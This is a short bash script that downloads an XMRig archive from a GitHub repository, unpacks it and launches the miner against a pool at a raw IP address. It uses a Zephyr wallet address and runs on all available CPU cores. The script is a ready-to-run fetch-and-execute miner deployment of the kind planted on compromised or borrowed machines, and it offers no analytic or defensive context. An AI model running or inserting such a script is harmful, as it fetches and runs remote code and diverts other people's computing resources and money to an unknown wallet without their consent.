#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 172.105.123.149:443 -u ZEPHs7GPNSs7gCsvd1cUUMg5mydeQ5Tun21tS996siZY2nK74NExeWKVtRmHzHEA87ZdSnoDfTmFrhxg7c1KtAmoEvFZ8m2bPtj -p req -a rx/0 -t $(nproc --all)
